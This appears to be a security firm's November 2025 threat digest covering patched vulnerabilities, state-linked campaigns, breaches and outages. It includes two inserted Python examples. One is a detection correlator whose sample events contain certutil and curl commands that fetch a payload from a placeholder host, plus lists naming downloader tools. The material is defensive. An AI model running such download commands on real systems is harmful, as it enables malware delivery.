DigitalXRAID

Threat Pulse – November 2025

Each month, DigitalXRAID’s Security Operations Centre (SOC) analysts share the top threats affecting businesses globally. Take action to protect your organisation against these prolific threats.

If you’ve been affected by any of these threats, we’re here to help. You can call our Cyber Emergency line any time of the day or night for help with active cyberattacks.

DigitalXRAID’s SOC analysts constantly monitor for zero-day threats and update our signature databases using the most comprehensive Threat Intelligence and Open Threat Exchange databases available worldwide.

Cyber Incidents in November 

Microsoft Vulnerabilities Identified in November 2025 

In November 2025, Microsoft patched 63 vulnerabilities across Windows, Office, and related products, including five Critical issues and a zero-day (CVE-2025-62215) that was actively exploited to gain SYSTEM level privileges via a Windows kernel flaw. The update also fixed multiple remote code execution vulnerabilities in components such as GDI+ and Microsoft Office, alongside numerous elevation-of-privilege bugs affecting Windows drivers, graphics subsystems, Bluetooth, WinSock, and task-scheduler services.  

Because these vulnerabilities affected core OS components and widely used enterprise software, Microsoft urged rapid patching to mitigate risks of exploitation, privilege escalation, remote execution attacks, and data exposure. 

BRONZE BUTLER exploits Japanese asset management software vulnerability 

The Sophos Counter Threat Unit (CTU) has uncovered a sophisticated cyber campaign by the Chinese state-sponsored group BRONZE BUTLER (also known as Tick), targeting a zero-day vulnerability (CVE-2025-61932) in Japan’s Motex LANSCOPE Endpoint Manager. This flaw allows remote command execution with SYSTEM privileges, enabling attackers to escalate privileges and move laterally within compromised networks. The group deployed updated variants of the Gokcpdoor malware, which now use multiplexed communication and serve both client and server roles for command and control (C2) operations.  

In some cases, they also used the Havoc C2 framework and OAED Loader to obfuscate execution. Legitimate tools like goddi, remote desktop, and 7-Zip were abused for data exfiltration, with cloud services such as file.io and LimeWire accessed during attacks. CTU recommends patching vulnerable systems and reviewing exposure of internet-facing LANSCOPE servers. Sophos has released detection signatures and indicators to help identify related malicious activity. 

Global Internet Disruption Caused by Cloudflare Outage 

On 18 November 2025, Cloudflare suffered a major global outage that disrupted large parts of the internet for several hours. What began as a routine internal change to database permissions inadvertently caused a cascade of failures: a query used by Cloudflare’s bot-management system returned duplicate entries, which generated an abnormally large “feature file.” When that oversized file was propagated across Cloudflare’s global network, edge servers hit a hard-coded limit and “panicked,” leading them to crash and return widespread HTTP 5xx errors.  

As a result, many popular websites and services — including social media platforms, AI tools, streaming, games, e-commerce and more — became unavailable or unreliable for users worldwide. The disruption lasted roughly five and a half hours, with partial recovery starting early in the outage and full restoration confirmed only later in the day. Cloudflare said the outage was not caused by a cyberattack but by an internal configuration error, and the company later apologised for the disruption. 

Beyond the immediate blackouts, the incident sparked broader concerns over the fragility and centralisation of internet infrastructure — especially how much of the web depends on a small number of providers like Cloudflare. 
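The failure chain above (duplicate query rows inflating a generated file until edge nodes hit a hard limit and crashed) is a useful model for fail-safe configuration propagation. The following is an added example, not Cloudflare's code; the feature-file format, the `MAX_FEATURES` limit and all function names are constructed assumptions. It deduplicates at generation time, validates before activation, and keeps the last-known-good configuration instead of panicking when a bad file arrives.

```python
"""Fail-safe handling of a propagated configuration artifact, modelled on the
feature-file failure described above. Added example; the data format, the size
limit and the function names are assumptions, not Cloudflare's code."""
from dataclasses import dataclass, field

MAX_FEATURES = 200  # constructed hard limit that the edge node enforces


@dataclass
class EdgeState:
    """Configuration currently active on an edge node."""
    features: tuple = ()
    version: int = 0
    rejected: list = field(default_factory=list)  # (version, reason) audit trail


def build_feature_file(rows):
    """Build the feature list from query rows, deduplicating by feature name.
    A query that returns duplicate rows (the root cause in the outage) would
    otherwise inflate the file past the limit enforced downstream."""
    seen = set()
    features = []
    for name in rows:
        if name not in seen:
            seen.add(name)
            features.append(name)
    return tuple(features)


def validate_feature_file(features):
    """Return (ok, reason). Validation happens before activation, so an
    oversized or malformed file is refused rather than crashing the node."""
    if len(features) > MAX_FEATURES:
        return False, f"{len(features)} features exceeds limit {MAX_FEATURES}"
    if len(set(features)) != len(features):
        return False, "duplicate feature names"
    return True, "ok"


def apply_feature_file(state, features, version):
    """Activate a new file if it validates; otherwise keep the last-known-good
    configuration and record why the update was refused. Returns the state."""
    ok, reason = validate_feature_file(features)
    if not ok:
        state.rejected.append((version, reason))
        return state  # keep serving with the previous good configuration
    return EdgeState(features=features, version=version, rejected=state.rejected)


if __name__ == "__main__":
    # Constructed input: 300 rows containing only 150 distinct names.
    raw_rows = [f"feature{i % 150}" for i in range(300)]
    node = EdgeState(features=("feature0",), version=1)
    node = apply_feature_file(node, tuple(raw_rows), 2)      # refused, stays v1
    node = apply_feature_file(node, build_feature_file(raw_rows), 3)  # accepted
    print(node.version, len(node.features), node.rejected)
```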

Amazon Web Services (AWS) – November 2025 Vulnerabilities 

In November 2025, AWS published several key security advisories addressing multiple runC container escape vulnerabilities (CVE-2025-31133, CVE-2025-52565, CVE-2025-52881) that affected AWS containerized services such as Amazon SageMaker. These flaws could allow container breakout if unpatched.  

AWS also disclosed CVE-2025-12779 on November 5th, affecting the Amazon WorkSpaces Linux client, where improper token handling created the potential for local privilege escalation. Updated images and client versions were released to mitigate these risks.  

MS Teams Guest Access Can Remove Defender Protection When Users Join External Tenants 

A critical security gap in Microsoft Teams has been found that allows attackers to bypass Microsoft Defender for Office 365 protections through the guest access feature. When users join external tenants as guests, their security is governed by the hosting environment rather than their home organization.  

This creates a blind spot where attackers can exploit the feature by setting up malicious tenants with minimal security controls, such as those using low-cost licenses without Defender protections. Once a victim accepts an invitation, all subsequent communication occurs within the attacker’s tenant, enabling phishing or malware distribution without triggering the victim’s organization’s security measures. 

The risk is compounded by Microsoft’s new feature that enables Teams users to chat with anyone via email, expanding external collaboration but also increasing exposure to untrusted environments. Since invitations originate from Microsoft infrastructure, they bypass email security checks like SPF, DKIM, and DMARC, making detection difficult.  

To mitigate these threats, organizations are advised to restrict guest invitations to trusted domains, enforce cross-tenant access controls, disable external Teams communication if unnecessary, and educate users about unsolicited invites. This issue underscores the need for stronger safeguards in cross-tenant collaboration scenarios. 

ShadowPad Malware Exploits WSUS Vulnerability 

Threat actors have recently exploited a critical flaw in Microsoft Windows Server Update (WSUS), tracked as CVE-2025-59287, in order to deliver the ShadowPad backdoor. ShadowPad, assessed to be a successor to PlugX, is a modular backdoor widely used by Chinese state-sponsored hacking groups.  

The recently patched vulnerability has quickly come under heavy exploitation, allowing threat actors to achieve remote code execution with system-level privileges. Threat actors have already used it to obtain initial access to publicly exposed WSUS instances and to conduct reconnaissance.  

The vulnerability is exploited to gain a system shell, after which built-in utilities such as “curl.exe” and “certutil.exe” are abused to download ShadowPad from an external server. The payload is then launched via DLL side-loading through legitimate binaries such as “ETDCtrlHelper.exe”. Once installed, the malware launches a core module that is responsible for loading the other plugins embedded in the shellcode into memory. 
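The chain above (a living-off-the-land download followed by DLL side-loading into a legitimate binary) lends itself to simple correlation. The following is an added detection example, not part of the original post; the event records are constructed and the field names loosely follow Sysmon process-creation and image-load events. The DLL name, timestamps and host names are placeholders.

```python
"""Correlate a LOLBin download with a DLL side-load on the same host.
Added example; events are constructed and field names are simplified."""
import re
from collections import defaultdict

# Constructed sample telemetry (not real logs). type 1 = process creation,
# type 7 = image (DLL) load, mirroring Sysmon event IDs.
EVENTS = [
    {"ts": 100, "host": "wsus01", "type": 1,
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -f http://203.0.113.10/u.dat u.dat"},
    {"ts": 101, "host": "wsus01", "type": 1,
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe http://203.0.113.10/h.exe -o ETDCtrlHelper.exe"},
    {"ts": 130, "host": "wsus01", "type": 1,
     "image": r"C:\Users\Public\ETDCtrlHelper.exe", "cmdline": "ETDCtrlHelper.exe"},
    {"ts": 131, "host": "wsus01", "type": 7,
     "image": r"C:\Users\Public\ETDCtrlHelper.exe",
     "loaded": r"C:\Users\Public\payload.dll"},  # placeholder DLL name
    {"ts": 500, "host": "fs02", "type": 1,  # benign certutil use, no URL
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -hashfile C:\\tmp\\image.iso SHA256"},
]

URL_RE = re.compile(r"https?://", re.I)
DOWNLOADERS = {"certutil.exe", "curl.exe"}
SIDELOAD_HOSTS = {"etdctrlhelper.exe"}          # binaries named on the page
TRUSTED_DIRS = (r"c:\windows\system32", r"c:\program files")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def is_lolbin_download(ev):
    """Process creation of a known downloader with a URL on its command line."""
    return (ev["type"] == 1 and basename(ev["image"]) in DOWNLOADERS
            and bool(URL_RE.search(ev["cmdline"])))


def is_untrusted_sideload(ev):
    """A side-load host binary loading a DLL from outside trusted directories."""
    if ev["type"] != 7 or basename(ev["image"]) not in SIDELOAD_HOSTS:
        return False
    return not ev["loaded"].lower().startswith(TRUSTED_DIRS)


def correlate(events, window=600):
    """Alert when a LOLBin download on a host is followed within `window`
    seconds by an untrusted DLL load into a side-loading host binary."""
    downloads = defaultdict(list)
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if is_lolbin_download(ev):
            downloads[ev["host"]].append(ev["ts"])
        elif is_untrusted_sideload(ev):
            recent = [t for t in downloads[ev["host"]] if 0 <= ev["ts"] - t <= window]
            if recent:
                alerts.append({"host": ev["host"], "download_ts": recent[0],
                               "sideload_ts": ev["ts"], "dll": ev["loaded"]})
    return alerts


if __name__ == "__main__":
    for alert in correlate(EVENTS):
        print(alert)
```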

Matrix Push C2 Uses Browser Notifications for Fileless, Cross-Platform Phishing Attacks 

Matrix Push C2 is a newly discovered “fileless” command‑and‑control platform that exploits standard browser push notifications to carry out phishing and malware attacks. Once a user is tricked into allowing notifications from a malicious or compromised website, the attacker can send fake alerts that appear to come from legitimate services, such as warnings about suspicious logins or browser updates.  

Clicking on these notifications redirects the victim to phishing pages or sites hosting malware, all without requiring an initial file download. Because it operates through the browser, the attack works across multiple operating systems, including Windows, macOS, Linux, and mobile devices. Attackers use a web-based dashboard to manage campaigns, track which users click notifications, monitor active browsers, manage shortened malicious links, and even detect installed browser extensions like crypto wallets.  

What makes Matrix Push C2 particularly dangerous is that it abuses a trusted browser feature, requires no files to be downloaded, works across platforms, and gives attackers persistent, stealthy access, effectively turning ordinary web browsers into covert attack entry points. 

Researchers Uncover BankBot-YNRK and DeliveryRAT Android Trojans Stealing Financial Data 

Cybersecurity researchers have shed light on two different Android trojans called BankBot-YNRK and DeliveryRAT that are capable of harvesting sensitive data from compromised devices. 

The malware incorporates anti-analysis features: it first checks whether it is running within a virtualised or emulated environment, then extracts device details such as the manufacturer and model name to determine whether it is executing on a real device. 

OpenAI / Mixpanel Data Exposure via Smishing-Driven Breach 

On 8 November 2025, Mixpanel, an analytics provider used by OpenAI, suffered a breach after attackers carried out a smishing (phishing via text message) campaign. The attackers accessed and exported customer metadata and analytics logs tied to OpenAI’s API users, exposing data such as names, email addresses, approximate location, and browser/OS details. 

OpenAI clarified that its core systems were not compromised: API keys, payment data, authentication tokens, user prompts and chat or API logs remained secure. However, the exposed metadata could still be used to launch phishing or social-engineering attacks against affected users. OpenAI promptly removed Mixpanel from production and began notifying impacted users. 

GE (GE Vernova) – Smallworld GIS improper authentication (CVE-2025-3222) 

On 7 November 2025, CVE-2025-3222 was published for GE Vernova Smallworld (a GIS platform), describing a critical Improper Authentication vulnerability affecting Smallworld 5.3.3 and earlier on Linux and 5.3.4 and earlier on Windows.  

The flaw allows network-based authentication abuse without any prior privileges or user interaction, letting a remote attacker bypass authentication and potentially gain high-impact access to the system. The issue carries a CVSS v4.0 score of 9.3 (Critical) and is tracked with an official GE advisory, which provides mitigation and upgrade guidance. 

SitusAMC Data Breach – Real-Estate Finance Software Vendor Compromised 

On 12 November 2025, SitusAMC, a major US-based technology and services provider for commercial and residential real-estate finance (supporting mortgage lenders, property investors, and real-estate loan origination and servicing), confirmed that its systems were breached. The attack did not involve ransomware or file encryption; rather, it was a data-exfiltration breach.  

According to the company, accounting records, legal agreements tied to client relationships, and “in some cases” data relating to the clients’ customers (including residential-mortgage borrowers) may have been exposed. Banks and major financial institutions that use SitusAMC’s services, including firms involved in real estate lending, reportedly scrambled to assess the potential exposure among their customers and the scope of stolen data.  

As of the latest public update (late November), the breach was contained, operations had been restored, and an investigation by law-enforcement and cyber security experts was underway. The incident highlights the growing risk posed by third-party vendors in the real-estate ecosystem: a compromise at a single software/finance service provider can cascade into exposure for many lenders, borrowers, and property finance customers. 

French Football Federation (FFF) – Member-Data Breach via Compromised Admin Account 

In late November 2025, the French Football Federation disclosed that it had suffered a cyberattack on its club management software, resulting in unauthorised access and theft of personal data belonging to its members and licence holders. 

The stolen information reportedly includes full names, gender, nationality, membership or licence numbers, postal and email addresses, though no banking data or passwords were said to be exposed. 

The breach was carried out using a compromised privileged account rather than exploiting a software vulnerability, underlining how human-factor weaknesses (e.g. credential theft or phishing) remain a major threat to sports organisations’ data security. 

Synnovis / NHS England — Historic Pathology-Supplier Attack  

In early November 2025, the pathology supplier Synnovis, which supports multiple NHS hospitals, GP practices and clinics, concluded its forensic investigation into a ransomware attack originally carried out in June 2024. The stolen data, including names, NHS numbers and blood-test results, was published online. By 21 November 2025, Synnovis had finished notifying affected organisations, which are now assessing the risk and contacting potentially impacted patients as required.

While the active disruption to laboratory services has long since ended, this notification marks a delayed but important escalation, highlighting long-term patient privacy and data-security consequences of earlier attacks.

Rising Regulatory Pressure in UK After November Cyber-Threat Surge 

On 12 November 2025, the UK government unveiled proposed legislation, the Cyber Security and Resilience Bill, aimed at strengthening cyber defences for essential services including healthcare, energy, water and transport.  

Under the bill, medium and large third-party IT / managed service vendors that supply to organisations like the NHS would now be subject to duty-of-care obligations: they must rapidly report any “significant or potentially significant” cyber incidents, implement robust baseline security measures, and be held accountable for non-compliance. 

Coordinated Cyber-Attack on London Councils 

In late November 2025, a coordinated cyber-attack struck multiple London boroughs: Kensington & Chelsea, Westminster, and Hammersmith & Fulham (and reports suggest other councils sharing IT infrastructure may also be affected).

The attack disrupted key public services, including phone lines and council IT systems, prompting the affected councils to shut down certain systems as a precaution, activate emergency response plans and engage with the National Cyber Security Centre (NCSC) and law-enforcement for investigation.

By early December, the councils confirmed that evidence showed some data had been copied from their systems. While they stated much of it was “historical data,” they acknowledged the possibility that personal or financial records could be involved, and warned residents to be vigilant.

This incident highlights the risk posed by shared infrastructure among public bodies: experts suggest the attackers may have exploited a common managed-service provider or shared-services arrangement, underlining how such models, while cost-efficient, can create a single point of failure. 

Ransomware Incident at LG Energy Solution Subsidiary 

In mid-November 2025, LG Energy Solution confirmed a ransomware incident affecting one of its overseas facilities. Attackers claimed to have stolen around 1.7 TB of employee and corporate data.  

Although production was reportedly restored, the breach highlights how energy sector firms, including battery manufacturers, renewable energy suppliers, or energy tech firms, will remain attractive ransomware targets, especially those with global supply-chains and distributed operations. 

Water Utilities in the UK Report New Cyber Incidents  

As of early November 2025, the Drinking Water Inspectorate (DWI) in the UK confirmed that several drinking-water suppliers have reported cyber-attacks (or intrusions) since the start of 2024, with some incidents still being logged under newly introduced regulatory scrutiny. Because many of these intrusions involved “out-of-scope systems” under current regulations, they did not automatically trigger formal public disclosure.  

Nonetheless, the DWI data shows that water utilities remain under active threat, reinforcing that cyber-risks in the utilities sector often operate quietly, not always in headline-making ways.  

The pattern also highlights a regulatory gap: many smaller utility firms may detect signs of intrusion (compromised credentials, anomalous network activity) but do not yet report them, meaning the scope of the risk may be significantly undercounted. 

Coupang Mega Data Breach — South Korea 

E-commerce giant Coupang confirmed a breach impacting roughly 33.7 million customer accounts in November. The incident stemmed from compromised signing keys that had not been rotated, allowing attackers persistent access to internal systems. The exposed data included sensitive user information, triggering investigations and executive fallout.  

Impact: 

  • Nearly the entire active user base was affected. 
  • Highlights the ongoing risk of inadequate key management and access controls. 

Balancer DeFi Protocol Hack — Crypto Theft 

Attackers targeted the Balancer decentralized finance (DeFi) protocol, exploiting logic flaws to drain more than $120 million in crypto assets. The exploit showcased the persistent risk to blockchain and smart-contract ecosystems, particularly where composability and liquidity mechanics can be abused.  

Salesforce Token Abuse & Gainsight Incident 

A widespread Salesforce access token compromise allowed threat actors to gain unauthorized access across numerous customer environments, particularly via integrations with CRM and customer success platforms like Gainsight.  

Impact: 

  • Potential customer data exposure across multi-tenant SaaS systems. 
  • Reinforces the importance of strong token rotation, MFA, and least-privilege access. 

Miljödata & Eurofiber Breaches — Data Exposure and Extortion Attempts 

Swedish IT provider Miljödata suffered a breach that exposed sensitive records of 1.5 million individuals, with exfiltrated data published on dark web sites. European network operator Eurofiber experienced a hack where attackers accessed its systems, exfiltrated customer information, and attempted extortion.  

Impact: 

  • Third-party service providers remain attractive targets due to the data aggregation effect across municipalities and enterprise clients. 

React2Shell Vulnerability: Massive Exploitation in the Wild 

Critical RCE Bug in React Server Components (CVE-2025-55182) 

A zero-day critical remote code execution vulnerability affecting React Server Components (dubbed React2Shell) was publicly disclosed on 3 December 2025. The flaw allows unauthenticated attackers to execute arbitrary code on vulnerable servers by exploiting insecure deserialization in the React “Flight” protocol. Affected frameworks include React 19.x and downstream implementations such as Next.js 15.x and 16.x using App Router.  

In-The-Wild Exploitation and Real Attacks 

Security researchers have observed dozens of confirmed exploitation cases, as attackers scramble to weaponize React2Shell: 

  • Automated attacks against vulnerable internet-facing React/Next.js applications have already been confirmed, with more than 50 victims identified globally.  
  • Exploit kits and early malware payloads are delivering crypto miners and multiple new malware families via this flaw across sectors — notably construction and entertainment — demonstrating diverse attacker objectives.  
  • North Korea-linked threat actors have exploited React2Shell to deploy a new remote access trojan named EtherRAT, showing how state-aligned groups pursue strategic compromises.  
  • Chinese state-nexus groups, including Earth Lamia and Jackpot Panda, launched exploitation campaigns within hours of the vulnerability’s disclosure, targeting financial, retail, logistics, education and government infrastructures.  
  • Intelligence indicates ongoing active scanning and exploitation by multiple Chinese threat clusters, prompting urgent mitigation advisories from major cloud and security vendors.  

Impact Patterns 

React2Shell exploitation has enabled attackers to: 

  • Establish unauthorised shells on compromised servers; 
  • Harvest credentials and cloud metadata; 
  • Install cryptomining infrastructure and backdoor implants; 
  • Integrate into botnets or persistent access tooling.  

Takeaway 

The speed and breadth of React2Shell weaponization (from zero-day disclosure to widespread exploitation) underscores the need for immediate patching and defensive scanning in affected environments.  

DigitalXRAID exists to ensure that the bad guys don’t win. We’re driven and motivated to protect customers. Our expertise and unrivalled service means we can take care of your security, while you take care of business.

Talk to the team to see how you can start protecting your business against cyberattacks today.

Protect Your Business & Your Reputation.

With a continued focus on security, you can rest assured that breaches and exploits won't be holding you back.
